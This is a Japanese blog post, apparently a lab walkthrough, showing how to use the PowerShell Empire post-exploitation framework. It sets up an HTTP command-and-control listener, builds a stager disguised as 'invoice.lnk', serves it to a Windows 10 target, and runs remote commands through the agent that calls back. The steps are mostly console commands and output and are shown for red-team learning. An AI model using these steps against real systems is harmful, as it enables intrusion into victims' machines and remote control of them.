LoginSignup
8
6

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 5 years have passed since last update.

@sanyamarseille(Marseille)

Powershell Empireを使う

Posted at

初期セットアップ

listenerと呼ばれるC2サーバーの構築を行う

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http          http_com      http_foreign  http_hop      http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://192.168.164.154:80        Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

コールバック用プログラムの作成

stagerと呼ばれるコールバック用プログラムを作成する

(Empire) > usestager
multi/bash                osx/applescript           osx/launcher              osx/teensy                windows/ducky             windows/launcher_vbs      windows/teensy
multi/launcher            osx/application           osx/macho                 windows/backdoorLnkMacro  windows/hta               windows/launcher_xml
multi/macro               osx/ducky                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro
multi/pyinstaller         osx/dylib                 osx/pkg                   windows/csharp_exe        windows/launcher_lnk      windows/macroless_msword
multi/war                 osx/jar                   osx/safari_launcher       windows/dll               windows/launcher_sct      windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info

Name: LNKLauncher

Description:
  Create a .LNK file that launches the Empire
  stager.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  OutFile          True        clickme.lnk       File to output LNK to.
  LNKComment       False                         LNK Comment.
  Base64           True        True              Switch. Base64 encode the output.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Icon             False       C:\program files\windows nt\accessories\wordpad.exePath to LNK icon.
  PowershellPath   True        C:\windows\system32\WindowsPowershell\v1.0\powershell.exePath to powershell.exe
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: invoice.lnk

プログラムの配布

今回は簡易Webサーバーを構築しダウンロードさせ、標的にstagerを実行させる

root@kali:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -

リモート操作

無事コールバックが発生し、C2サーバーと接続ができたら遠隔より操作する

(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144

(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:41:45

(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 target01 ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:42:10

 (Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener:         http://192.168.164.154:80
Internal IP:    192.168.164.144
Username:         DESKTOP-1SS146L\marseille
Hostname:       DESKTOP-1SS146L
OS:               Microsoft Windows 10 Pro
High Integrity:   0
Process Name:     powershell
Process ID:       592
Language:         powershell
Language Version: 5

[*] Valid results returned by 192.168.164.144

(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName        Aliases AddressList
--------        ------- -----------
DESKTOP-1SS146L {}      {192.168.164.144}
[*] Valid results returned by 192.168.164.144
8
6
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
8
6

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?